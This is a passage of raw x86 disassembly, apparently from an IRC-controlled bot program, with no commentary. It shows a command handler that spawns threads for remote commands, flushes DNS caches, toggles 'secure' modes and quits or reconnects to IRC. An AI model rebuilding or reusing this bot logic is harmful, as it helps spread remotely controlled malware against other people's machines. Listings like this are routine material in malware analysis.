--------------------------------------------------------------------------- loc_403B24: ; CODE XREF: sub_401ACD+203Dj mov edi, 104h lea eax, [ebp+var_2D50] push edi push eax push ebx call dword_427070 ; GetModuleFileNameA loc_403B38: ; CODE XREF: sub_401ACD+2055j mov esi, [ebp+esi+var_88] cmp esi, ebx jnz short loc_403B48 mov esi, offset byte_429110 loc_403B48: ; CODE XREF: sub_401ACD+2074j push esi lea eax, [ebp+var_2C4C] push edi push eax call sub_41B980 mov eax, dword_429078 push 7Fh push [ebp+var_88] mov [ebp+var_2B40], eax mov eax, [ebp+arg_4] mov [ebp+var_2B44], ebx mov [ebp+var_2D54], eax lea eax, [ebp+var_2B3C] push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 18h mov [ebp+var_2ABC], eax mov eax, [ebp+var_8] mov [ebp+var_2AB8], eax lea eax, [ebp+var_2D50] push eax lea eax, [ebp+var_2C4] push [ebp+var_2B40] push offset unk_42C55C push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 5 push eax call sub_40B0F7 add esp, 1Ch mov [ebp+var_2B48], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_2D54] push ebx push eax push offset sub_411797 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_2B48] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_403C14 loc_403BFE: ; CODE XREF: sub_401ACD+2145j cmp [ebp+var_2AB4], ebx jnz loc_40828C push 32h call dword_427078 ; Sleep jmp short loc_403BFE ; --------------------------------------------------------------------------- loc_403C14: ; CODE XREF: sub_401ACD+212Fj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42C520 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_403C25: ; CODE XREF: sub_401ACD+1B3Cj ; sub_401ACD+1B51j mov edi, [ebp+esi+var_8C] cmp edi, ebx jz short loc_403C44 push edi call sub_41B779 test eax, eax pop ecx jz short loc_403C44 push edi call sub_41B779 pop ecx jmp short loc_403C49 ; --------------------------------------------------------------------------- loc_403C44: ; CODE XREF: sub_401ACD+2161j ; sub_401ACD+216Cj mov eax, dword_42907C loc_403C49: ; CODE XREF: sub_401ACD+2175j mov esi, [ebp+esi+var_88] mov [ebp+var_36C8], eax xor eax, eax cmp [ebp+var_8FC], bl setz al cmp esi, ebx mov [ebp+var_36B4], eax jz short loc_403C7C lea eax, [ebp+var_37CC] push esi push eax call sub_41B886 pop ecx pop ecx jmp short loc_403CA7 ; --------------------------------------------------------------------------- loc_403C7C: ; CODE XREF: sub_401ACD+219Cj lea eax, [ebp+var_4FF4] push 104h push eax call dword_427074 ; GetSystemDirectoryA push ebx push ebx lea eax, [ebp+var_4C8] push ebx push eax lea eax, [ebp+var_4FF4] push eax call sub_41B9D1 add esp, 14h loc_403CA7: ; CODE XREF: sub_401ACD+21ADj lea eax, [ebp+var_37CC] push eax call sub_41AFE0 cmp [ebp+eax+var_37CD], 5Ch pop ecx jnz short loc_403CD2 lea eax, [ebp+var_37CC] push eax call sub_41AFE0 pop ecx mov [ebp+eax+var_37CD], bl loc_403CD2: ; CODE XREF: sub_401ACD+21EFj push [ebp+var_88] mov esi, [ebp+arg_4] lea eax, [ebp+var_3A54] mov [ebp+var_3A58], esi push 80h push eax call sub_41B980 mov eax, [ebp+var_8] mov edi, [ebp+var_4] add esp, 0Ch mov [ebp+var_36B8], eax lea eax, [ebp+var_37CC] mov [ebp+var_36BC], edi push eax push [ebp+var_36C8] push esi call sub_40AC10 pop ecx push eax lea eax, [ebp+var_2C4] push offset unk_42C4E4 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 3 push eax call sub_40B0F7 add esp, 20h mov [ebp+var_36C0], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_3A58] push ebx push eax push offset sub_40F0D6 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_36C0] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_403D86 loc_403D74: ; CODE XREF: sub_401ACD+22B7j cmp [ebp+var_36AC], ebx jnz short loc_403DA1 push 32h call dword_427078 ; Sleep jmp short loc_403D74 ; --------------------------------------------------------------------------- loc_403D86: ; CODE XREF: sub_401ACD+22A5j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42C4A8 loc_403D92: ; CODE XREF: sub_401ACD+241Aj ; sub_401ACD+4D05j ... lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 0Ch loc_403DA1: ; CODE XREF: sub_401ACD+22ADj ; sub_401ACD+23FEj ... cmp [ebp+var_8], ebx jnz loc_4083BD push ebx push edi jmp loc_407286 ; --------------------------------------------------------------------------- loc_403DB1: ; CODE XREF: sub_401ACD+1B12j ; sub_401ACD+1B27j mov edi, [ebp+esi+var_8C] cmp edi, ebx jz short loc_403DD0 push edi call sub_41B779 test eax, eax pop ecx jz short loc_403DD0 push edi call sub_41B779 pop ecx jmp short loc_403DD5 ; --------------------------------------------------------------------------- loc_403DD0: ; CODE XREF: sub_401ACD+22EDj ; sub_401ACD+22F8j mov eax, dword_429080 loc_403DD5: ; CODE XREF: sub_401ACD+2301j mov [ebp+var_1824], eax mov eax, [ebp+esi+var_88] cmp eax, ebx jnz short loc_403DEC lea eax, [ebp+var_C4] loc_403DEC: ; CODE XREF: sub_401ACD+2317j push eax lea eax, [ebp+var_1964] push 40h push eax call sub_41B980 mov esi, [ebp+esi+var_84] add esp, 0Ch cmp esi, ebx jnz short loc_403E0E mov esi, offset byte_43D808 loc_403E0E: ; CODE XREF: sub_401ACD+233Aj push esi lea eax, [ebp+var_1924] push 100h push eax call sub_41B980 add esp, 0Ch lea eax, [ebp+var_19E4] push [ebp+var_88] push 80h push eax call sub_41B980 mov eax, [ebp+var_8] mov esi, [ebp+arg_4] mov edi, [ebp+var_4] add esp, 0Ch mov [ebp+var_1810], eax lea eax, [ebp+var_1964] push eax mov [ebp+var_19E8], esi push [ebp+var_1824] mov [ebp+var_1814], edi push esi call sub_40AC10 pop ecx push eax lea eax, [ebp+var_2C4] push offset unk_42C46C push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 9 push eax call sub_40B0F7 add esp, 20h mov [ebp+var_1820], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_19E8] push ebx push eax push offset sub_410A4E push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_1820] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_403EDB loc_403EC5: ; CODE XREF: sub_401ACD+240Cj cmp [ebp+var_180C], ebx jnz loc_403DA1 push 32h call dword_427078 ; Sleep jmp short loc_403EC5 ; --------------------------------------------------------------------------- loc_403EDB: ; CODE XREF: sub_401ACD+23F6j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42C430 jmp loc_403D92 ; --------------------------------------------------------------------------- loc_403EEC: ; CODE XREF: sub_401ACD+1AE8j ; sub_401ACD+1AFDj mov esi, [ebp+esi+var_8C] cmp esi, ebx jz short loc_403EFF push esi call sub_41B779 jmp short loc_403F06 ; --------------------------------------------------------------------------- loc_403EFF: ; CODE XREF: sub_401ACD+2428j push 0Bh call sub_40B35E loc_403F06: ; CODE XREF: sub_401ACD+2430j cmp eax, ebx pop ecx jz loc_409855 push eax push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_40BA57 jmp loc_4043BA ; --------------------------------------------------------------------------- loc_403F26: ; CODE XREF: sub_401ACD+1ABEj ; sub_401ACD+1AD3j mov eax, ds:dword_4CB570 cmp eax, ebx jz short loc_403F43 call eax ; DnsFlushResolverCache test eax, eax jz short loc_403F3C push offset unk_42C40C jmp short loc_403F48 ; --------------------------------------------------------------------------- loc_403F3C: ; CODE XREF: sub_401ACD+2466j push offset unk_42C3E0 jmp short loc_403F48 ; --------------------------------------------------------------------------- loc_403F43: ; CODE XREF: sub_401ACD+2460j push offset unk_42C3B4 loc_403F48: ; CODE XREF: sub_401ACD+246Dj ; sub_401ACD+2474j ... lea eax, [ebp+var_2C4] push 200h push eax call sub_41B980 jmp loc_406CDC ; --------------------------------------------------------------------------- loc_403F5E: ; CODE XREF: sub_401ACD+1A94j ; sub_401ACD+1AA9j call sub_40AB32 test eax, eax jz short loc_403F6E push offset unk_42C390 jmp short loc_403F48 ; --------------------------------------------------------------------------- loc_403F6E: ; CODE XREF: sub_401ACD+2498j push offset unk_42C364 jmp short loc_403F48 ; --------------------------------------------------------------------------- loc_403F75: ; CODE XREF: sub_401ACD+1A6Aj ; sub_401ACD+1A7Fj cmp [ebp+var_8], ebx jnz short loc_403F94 push ebx push [ebp+var_4] push offset dword_42C34C push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_403F94: ; CODE XREF: sub_401ACD+24ABj push ebx push [ebp+var_4] call sub_4181D7 push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 push offset dword_42C330 jmp loc_404286 ; --------------------------------------------------------------------------- loc_403FB6: ; CODE XREF: sub_401ACD+18FAj ; sub_401ACD+190Fj push 0Ah call sub_40B33F test eax, eax pop ecx jle short loc_403FCC push offset unk_42C304 jmp loc_409602 ; --------------------------------------------------------------------------- loc_403FCC: ; CODE XREF: sub_401ACD+24F3j push [ebp+var_88] push [ebp+arg_4] call sub_419C65 pop ecx cmp eax, 0FFFFFFFFh pop ecx jnz short loc_403FEB push offset unk_42C2DC jmp loc_409602 ; --------------------------------------------------------------------------- loc_403FEB: ; CODE XREF: sub_401ACD+2512j push offset unk_42C2BC jmp loc_409602 ; --------------------------------------------------------------------------- loc_403FF5: ; CODE XREF: sub_401ACD+18D0j ; sub_401ACD+18E5j push [ebp+var_8] push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_40A7CF jmp loc_401E91 ; --------------------------------------------------------------------------- loc_40400E: ; CODE XREF: sub_401ACD+18A6j ; sub_401ACD+18BBj push [ebp+esi+var_8C] push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_416C29 jmp loc_401E91 ; --------------------------------------------------------------------------- loc_40402B: ; CODE XREF: sub_401ACD+187Cj ; sub_401ACD+1891j or edi, 0FFFFFFFFh call dword_4270A8 ; GetTickCount xor edx, edx mov ecx, 3E8h div ecx mov esi, [ebp+esi+var_8C] cmp esi, ebx mov [ebp+arg_0], eax jz short loc_404054 push esi call sub_41B779 pop ecx mov edi, eax loc_404054: ; CODE XREF: sub_401ACD+257Cj mov eax, [ebp+arg_0] xor edx, edx mov ecx, 15180h div ecx cmp eax, edi jnb short loc_40406D cmp edi, 0FFFFFFFFh jnz loc_409855 loc_40406D: ; CODE XREF: sub_401ACD+2595j push ebx call sub_41A88C pop ecx push eax lea eax, [ebp+var_2C4] push offset dword_42C2A4 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 lea eax, [ebp+var_2C4] push eax call sub_4151AD loc_4040AB: ; CODE XREF: sub_401ACD+529Dj add esp, 24h jmp loc_409855 ; --------------------------------------------------------------------------- loc_4040B3: ; CODE XREF: sub_401ACD+1852j ; sub_401ACD+1867j push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_415A30 add esp, 0Ch push offset dword_42C284 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_4040D1: ; CODE XREF: sub_401ACD+1828j ; sub_401ACD+183Dj push 27h call sub_40B33F test eax, eax pop ecx jle short loc_404105 cmp [ebp+var_8], ebx jnz loc_401E94 push ebx push [ebp+var_4] push offset unk_42C264 push [ebp+var_88] push [ebp+arg_4] call sub_409A73 loc_4040FD: ; CODE XREF: sub_401ACD+7238j add esp, 14h jmp loc_401E94 ; --------------------------------------------------------------------------- loc_404105: ; CODE XREF: sub_401ACD+260Ej push [ebp+var_88] lea eax, [ebp+var_B2C] push 80h push eax call sub_41B980 mov eax, [ebp+arg_4] mov esi, [ebp+esi+var_8C] mov [ebp+var_B30], eax mov eax, [ebp+var_4] mov [ebp+var_AA4], eax mov eax, [ebp+var_8] add esp, 0Ch cmp esi, ebx mov [ebp+var_AA0], eax mov [ebp+var_AA8], ebx jz short loc_404166 push esi push offset aFull ; "full" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_404166 mov [ebp+var_AA8], 1 loc_404166: ; CODE XREF: sub_401ACD+267Cj ; sub_401ACD+268Dj lea eax, [ebp+var_2C4] push offset dword_42C240 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 27h push eax call sub_40B0F7 add esp, 14h mov [ebp+var_AAC], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_B30] push ebx push eax push offset sub_4198EC push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_AAC] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_4041D4 loc_4041BE: ; CODE XREF: sub_401ACD+2705j cmp [ebp+var_A9C], ebx jnz loc_409631 push 32h call dword_427078 ; Sleep jmp short loc_4041BE ; --------------------------------------------------------------------------- loc_4041D4: ; CODE XREF: sub_401ACD+26EFj call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_2C4] push offset unk_42C204 push eax call sub_41B886 add esp, 0Ch jmp loc_409631 ; --------------------------------------------------------------------------- loc_4041F4: ; CODE XREF: sub_401ACD+17FEj ; sub_401ACD+1813j cmp [ebp+var_8], ebx jnz short loc_404213 push ebx push [ebp+var_4] push offset dword_42C1E8 push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_404213: ; CODE XREF: sub_401ACD+272Aj push [ebp+arg_4] call ds:dword_4CB6EC ; closesocket call ds:dword_4CB5AC ; WSACleanup call sub_41835A push ebx call dword_427064 ; ExitProcess loc_40422E: ; CODE XREF: sub_401ACD+17D4j ; sub_401ACD+17E9j push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push [ebp+arg_4] push eax call sub_41AA43 pop ecx pop ecx push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 push offset dword_42C1CC jmp short loc_404286 ; --------------------------------------------------------------------------- loc_404259: ; CODE XREF: sub_401ACD+17AAj ; sub_401ACD+17BFj push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push [ebp+arg_4] push [ebp+arg_1C] push eax call sub_41ACF7 add esp, 0Ch push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 push offset dword_42C1B0 loc_404286: ; CODE XREF: sub_401ACD+24E4j ; sub_401ACD+278Aj call sub_4151AD add esp, 18h jmp loc_409855 ; --------------------------------------------------------------------------- loc_404293: ; CODE XREF: sub_401ACD+1780j ; sub_401ACD+1795j push [ebp+var_8] push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_41524D jmp loc_401E91 ; --------------------------------------------------------------------------- loc_4042AC: ; CODE XREF: sub_401ACD+1756j ; sub_401ACD+176Bj cmp [ebp+var_C], ebx mov [ebp+var_1594], bl jz short loc_4042EB mov esi, [ebp+esi+var_8C] cmp esi, ebx jz short loc_4042EB push esi push [ebp+var_C] call sub_41B900 pop ecx cmp eax, ebx pop ecx jz short loc_4042EB push eax push offset aS_2 ; "%s" lea eax, [ebp+var_1594] push 80h push eax call sub_41B980 add esp, 10h loc_4042EB: ; CODE XREF: sub_401ACD+27E8j ; sub_401ACD+27F3j ... push [ebp+var_88] lea eax, [ebp+var_1614] push 80h push eax call sub_41B980 mov eax, [ebp+arg_4] add esp, 0Ch mov [ebp+var_1618], eax mov eax, [ebp+var_4] mov [ebp+var_1510], eax mov eax, [ebp+var_8] mov [ebp+var_150C], eax lea eax, [ebp+var_2C4] push offset dword_42C198 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 25h push eax call sub_40B0F7 add esp, 14h mov [ebp+var_1514], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_1618] push ebx push eax push offset sub_41528E push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_1514] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40438E loc_404378: ; CODE XREF: sub_401ACD+28BFj cmp [ebp+var_1508], ebx jnz loc_401E94 push 32h call dword_427078 ; Sleep jmp short loc_404378 ; --------------------------------------------------------------------------- loc_40438E: ; CODE XREF: sub_401ACD+28A9j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42C160 jmp loc_402077 ; --------------------------------------------------------------------------- loc_40439F: ; CODE XREF: sub_401ACD+172Cj ; sub_401ACD+1741j push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_415135 push offset dword_42C148 call sub_4151AD loc_4043BA: ; CODE XREF: sub_401ACD+2454j add esp, 10h jmp loc_409855 ; --------------------------------------------------------------------------- loc_4043C2: ; CODE XREF: sub_401ACD+1702j ; sub_401ACD+1717j push [ebp+var_88] lea eax, [ebp+var_BC4] push 80h push eax call sub_41B980 mov eax, [ebp+arg_4] mov esi, [ebp+esi+var_8C] mov [ebp+var_BC8], eax mov eax, [ebp+var_4] mov [ebp+var_B3C], eax mov eax, [ebp+var_8] add esp, 0Ch cmp esi, ebx mov [ebp+var_B38], eax jz short loc_40441C push offset dword_42C144 push esi call sub_41C070 neg eax sbb eax, eax pop ecx inc eax pop ecx mov [ebp+var_B40], eax jmp short loc_404422 ; --------------------------------------------------------------------------- loc_40441C: ; CODE XREF: sub_401ACD+2933j mov [ebp+var_B40], ebx loc_404422: ; CODE XREF: sub_401ACD+294Dj lea eax, [ebp+var_2C4] push offset dword_42C124 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 28h push eax call sub_40B0F7 add esp, 14h mov [ebp+var_B44], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_BC8] push ebx push eax push offset sub_40B162 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_B44] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_404490 loc_40447A: ; CODE XREF: sub_401ACD+29C1j cmp [ebp+var_B34], ebx jnz loc_406D00 push 32h call dword_427078 ; Sleep jmp short loc_40447A ; --------------------------------------------------------------------------- loc_404490: ; CODE XREF: sub_401ACD+29ABj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42C0E8 jmp loc_409227 ; --------------------------------------------------------------------------- loc_4044A1: ; CODE XREF: sub_401ACD+1686j ; sub_401ACD+169Bj push offset aQufpoius ; "qufpoius" push offset dword_42C0D0 loc_4044AB: ; CODE XREF: sub_401ACD+2A1Dj lea eax, [ebp+var_2C4] push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 20h jmp loc_406D00 ; --------------------------------------------------------------------------- loc_4044D8: ; CODE XREF: sub_401ACD+165Cj ; sub_401ACD+1671j push ds:dword_4CB394 call sub_41A88C pop ecx push eax push offset unk_42C0A4 jmp short loc_4044AB ; --------------------------------------------------------------------------- loc_4044EC: ; CODE XREF: sub_401ACD+1632j ; sub_401ACD+1647j mov esi, [ebp+esi+var_8C] cmp esi, ebx jz short loc_40451E cmp [ebp+var_C], ebx jz short loc_40452D push esi push [ebp+var_C] call sub_41B900 pop ecx cmp eax, ebx pop ecx jz short loc_40452D push eax push offset aQuitS ; "QUIT :%s\r\n" push [ebp+arg_4] call sub_409A2D add esp, 0Ch jmp short loc_40452D ; --------------------------------------------------------------------------- loc_40451E: ; CODE XREF: sub_401ACD+2A28j push offset aQuitLater ; "QUIT :later\r\n" push [ebp+arg_4] call sub_409A2D pop ecx pop ecx loc_40452D: ; CODE XREF: sub_401ACD+2A2Dj ; sub_401ACD+2A3Cj ... push 0FFFFFFFEh jmp loc_401E96 ; --------------------------------------------------------------------------- loc_404534: ; CODE XREF: sub_401ACD+1608j ; sub_401ACD+161Dj push offset aQuitDisconnect ; "QUIT :disconnecting\r\n" push [ebp+arg_4] call sub_409A2D push offset dword_42C054 call sub_4151AD add esp, 0Ch or eax, 0FFFFFFFFh jmp loc_401E97 ; --------------------------------------------------------------------------- loc_404556: ; CODE XREF: sub_401ACD+15DEj ; sub_401ACD+15F3j push offset aQuitReconnecti ; "QUIT :reconnecting\r\n" push [ebp+arg_4] call sub_409A2D push offset dword_42C020 call sub_4151AD add esp, 0Ch jmp loc_4097BA ; --------------------------------------------------------------------------- loc_404575: ; CODE XREF: sub_401ACD+15B4j ; sub_401ACD+15C9j push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_40B7DB jmp loc_404934 ; --------------------------------------------------------------------------- loc_40458B: ; CODE XREF: sub_401ACD+158Aj ; sub_401ACD+159Fj push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_40B786 jmp loc_404934 ; --------------------------------------------------------------------------- loc_4045A1: ; CODE XREF: sub_401ACD+1560j ; sub_401ACD+1575j push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_40B71A jmp loc_404934 ; --------------------------------------------------------------------------- loc_4045B7: ; CODE XREF: sub_401ACD+1536j ; sub_401ACD+154Bj push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_40B64B jmp loc_404934 ; --------------------------------------------------------------------------- loc_4045CD: ; CODE XREF: sub_401ACD+1491j ; sub_401ACD+14A6j push [ebp+esi+var_8C] push 27h push offset dword_42C010 push offset dword_42C000 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_4045E5: ; CODE XREF: sub_401ACD+1467j ; sub_401ACD+147Cj push [ebp+esi+var_8C] push 24h push offset dword_42BFF4 push offset dword_42BFE4 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_4045FD: ; CODE XREF: sub_401ACD+1083j ; sub_401ACD+1098j mov edi, [ebp+esi+var_8C] cmp edi, ebx jz short loc_40461C push edi call sub_41B779 test eax, eax pop ecx jz short loc_40461C push edi call sub_41B779 pop ecx jmp short loc_404621 ; --------------------------------------------------------------------------- loc_40461C: ; CODE XREF: sub_401ACD+2B39j ; sub_401ACD+2B44j mov eax, dword_429074 loc_404621: ; CODE XREF: sub_401ACD+2B4Dj mov esi, [ebp+esi+var_88] mov [ebp+var_590], eax cmp esi, ebx jz short loc_404646 push esi loc_404633: ; CODE XREF: sub_401ACD+2B88j lea eax, [ebp+var_5A0] push 10h push eax call sub_41B980 add esp, 0Ch jmp short loc_40465D ; --------------------------------------------------------------------------- loc_404646: ; CODE XREF: sub_401ACD+2B63j cmp [ebp+var_8FF], bl jz short loc_404657 lea eax, [ebp+var_C4] push eax jmp short loc_404633 ; --------------------------------------------------------------------------- loc_404657: ; CODE XREF: sub_401ACD+2B7Fj mov [ebp+var_5A0], bl loc_40465D: ; CODE XREF: sub_401ACD+2B77j mov eax, [ebp+var_4] push [ebp+var_88] mov esi, [ebp+arg_4] mov [ebp+var_584], eax mov eax, [ebp+var_8] push 80h mov [ebp+var_580], eax lea eax, [ebp+var_620] push eax mov [ebp+var_624], esi call sub_41B980 add esp, 0Ch push [ebp+var_590] push esi call sub_40AC10 pop ecx push eax lea eax, [ebp+var_2C4] push offset dword_42BFBC push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 19h push eax call sub_40B0F7 add esp, 1Ch mov [ebp+var_58C], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_624] push ebx push eax push offset sub_4111CE push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_58C] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40470E loc_4046F8: ; CODE XREF: sub_401ACD+2C3Fj cmp [ebp+var_57C], ebx jnz loc_401E94 push 32h call dword_427078 ; Sleep jmp short loc_4046F8 ; --------------------------------------------------------------------------- loc_40470E: ; CODE XREF: sub_401ACD+2C29j call dword_42708C ; RtlGetLastWin32Error push eax push offset dword_42BF80 jmp loc_402077 ; --------------------------------------------------------------------------- loc_40471F: ; CODE XREF: sub_401ACD+1019j ; sub_401ACD+102Ej mov esi, [ebp+esi+var_8C] cmp esi, ebx jz short loc_40473F push esi call sub_41B779 test ax, ax pop ecx jz short loc_40473F push esi call sub_41B779 pop ecx jmp short loc_404745 ; --------------------------------------------------------------------------- loc_40473F: ; CODE XREF: sub_401ACD+2C5Bj ; sub_401ACD+2C67j mov ax, word_429084 loc_404745: ; CODE XREF: sub_401ACD+2C70j push [ebp+var_88] mov esi, [ebp+arg_4] mov edi, [ebp+var_4] mov [ebp+var_97C], ax mov eax, [ebp+var_8] push 80h mov [ebp+var_96C], eax lea eax, [ebp+var_9FC] push eax mov [ebp+var_A00], esi mov [ebp+var_970], edi call sub_41B980 movzx eax, [ebp+var_97C] add esp, 0Ch push eax push esi call sub_40AC10 pop ecx push eax lea eax, [ebp+var_2C4] push offset unk_42BF54 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push edi push eax push [ebp+var_88] push esi call sub_409A73 push ebx lea eax, [ebp+var_2C4] push 6 push eax call sub_40B0F7 add esp, 30h mov [ebp+var_978], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_A00] push ebx push eax push offset sub_40E504 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_978] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_404814 loc_4047FE: ; CODE XREF: sub_401ACD+2D45j cmp [ebp+var_968], ebx jnz loc_401E94 push 32h call dword_427078 ; Sleep jmp short loc_4047FE ; --------------------------------------------------------------------------- loc_404814: ; CODE XREF: sub_401ACD+2D2Fj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42BF14 jmp loc_402077 ; --------------------------------------------------------------------------- loc_404825: ; CODE XREF: sub_401ACD+FC5j ; sub_401ACD+FDAj ... push edi push offset aSecure ; "secure" call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_40484D push edi push offset aSec ; "sec" call sub_41C070 pop ecx mov [ebp+var_A10], ebx test eax, eax pop ecx jnz short loc_404857 loc_40484D: ; CODE XREF: sub_401ACD+2D67j mov [ebp+var_A10], 1 loc_404857: ; CODE XREF: sub_401ACD+2D7Ej push [ebp+var_88] lea eax, [ebp+var_A94] push 80h push eax call sub_41B980 mov eax, [ebp+arg_4] add esp, 0Ch cmp [ebp+var_A10], ebx mov [ebp+var_A98], eax mov eax, [ebp+var_4] mov [ebp+var_A0C], eax mov eax, [ebp+var_8] mov [ebp+var_A08], eax mov eax, offset aSecuring ; "Securing" jnz short loc_40489E mov eax, offset aUnsecuring ; "Unsecuring" loc_40489E: ; CODE XREF: sub_401ACD+2DCAj push eax push offset dword_42BEE0 lea eax, [ebp+var_2C4] push 200h push eax call sub_41B980 push ebx lea eax, [ebp+var_2C4] push 22h push eax call sub_40B0F7 add esp, 1Ch mov [ebp+var_A14], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_A98] push ebx push eax push offset sub_419E1A push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_A14] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_404912 loc_4048FC: ; CODE XREF: sub_401ACD+2E43j cmp [ebp+var_A04], ebx jnz loc_4083BD push 32h call dword_427078 ; Sleep jmp short loc_4048FC ; --------------------------------------------------------------------------- loc_404912: ; CODE XREF: sub_401ACD+2E2Dj call dword_42708C ; RtlGetLastWin32Error push eax push offset dword_42BEA4 jmp loc_4083AE ; --------------------------------------------------------------------------- loc_404923: ; CODE XREF: sub_401ACD+F9Bj ; sub_401ACD+FB0j push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_41A6AF loc_404934: ; CODE XREF: sub_401ACD+2AB9j ; sub_401ACD+2ACFj ... add esp, 0Ch jmp loc_409855 ; --------------------------------------------------------------------------- loc_40493C: ; CODE XREF: sub_401ACD+F71j ; sub_401ACD+F86j push offset unk_42BDF4 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_404946: ; CODE XREF: sub_401ACD+F47j ; sub_401ACD+F5Cj push offset aAbosel7Vs ; "abosel7 vs" push offset dword_42BDE4 jmp loc_406CD0 ; --------------------------------------------------------------------------- loc_404955: ; CODE XREF: sub_401ACD+F1Dj ; sub_401ACD+F32j mov esi, [ebp+esi+var_8C] cmp esi, ebx jz short loc_4049AF push esi call sub_41B779 cmp eax, ebx pop ecx jl short loc_4049A7 cmp eax, 3 jge short loc_4049A7 mov edx, [ebp+arg_18] mov ecx, eax shl ecx, 7 cmp [ecx+edx], bl lea esi, [ecx+edx] jz short loc_40499F lea eax, [esi+1] push eax lea eax, [ebp+var_2C4] push offset unk_42D0B8 push eax call sub_41B886 add esp, 0Ch mov [esi], bl jmp loc_40828C ; --------------------------------------------------------------------------- loc_40499F: ; CODE XREF: sub_401ACD+2EB1j push eax push offset unk_42BDB8 jmp short loc_4049EC ; --------------------------------------------------------------------------- loc_4049A7: ; CODE XREF: sub_401ACD+2E9Cj ; sub_401ACD+2EA1j push eax push offset unk_42BD8C jmp short loc_4049EC ; --------------------------------------------------------------------------- loc_4049AF: ; CODE XREF: sub_401ACD+2E91j mov edi, [ebp+arg_18] xor esi, esi loc_4049B4: ; CODE XREF: sub_401ACD+2F03j push [ebp+var_90] push edi call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_4049D7 inc esi add edi, 80h cmp esi, 3 jl short loc_4049B4 jmp loc_40828C ; --------------------------------------------------------------------------- loc_4049D7: ; CODE XREF: sub_401ACD+2EF7j mov eax, [ebp+arg_18] shl esi, 7 mov [esi+eax], bl lea eax, [ebp+var_C4] push eax push offset unk_42D0B8 loc_4049EC: ; CODE XREF: sub_401ACD+2153j ; sub_401ACD+2ED8j ... lea eax, [ebp+var_2C4] push eax call sub_41B886 jmp loc_408289 ; --------------------------------------------------------------------------- loc_4049FD: ; CODE XREF: sub_401ACD+EF3j ; sub_401ACD+F08j push [ebp+var_8C] push offset dword_42D02C call sub_41C070 pop ecx test eax, eax pop 